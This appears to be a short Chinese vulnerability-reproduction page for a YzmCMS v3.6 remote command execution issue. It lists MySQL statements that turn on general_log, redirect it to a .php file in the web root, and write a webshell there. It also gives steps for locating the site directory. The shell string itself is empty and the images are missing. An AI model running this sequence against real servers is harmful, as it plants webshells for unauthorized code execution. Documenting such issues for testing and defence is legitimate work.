# YzmCMS v3.6 远程命令执行
========================
一、漏洞简介
————
二、漏洞影响
————
YzmCMS v3.6
三、复现过程
————
Payload:
show variables like ‘%general%’; #查看配置
set global general_log = on; #开启general log模式
set global general_log_file =CONCAT(“E:\\study\\WWW\\YzmCMS\\test.”,”php”);
select ‘‘; #写入shell
##### 1、执行sql语句,查看mysql日志配置情况
![](/static/qingy/YzmCMS_v3.6_远程命令执行/img/rId25.png)
#### 2、根据日志文件位置或者默认站点路径来推测站点目录,可用load\_file()函数来测试,确认站点目录位置。或者通过phpinfo()等信息收集获取站点目录。
![](/static/qingy/YzmCMS_v3.6_远程命令执行/img/rId27.png)
#### 3、分别执行下列sql语句,将脚本代码写入文件:
set global general_log = on;
set global general_log_file =CONCAT(“E:\\study\\WWW\\YzmCMS\\test.”,”php”); select ‘‘;
![](/static/qingy/YzmCMS_v3.6_远程命令执行/img/rId29.png)
#### 4、提交参数,执行脚本代码:
image
请登录后查看评论内容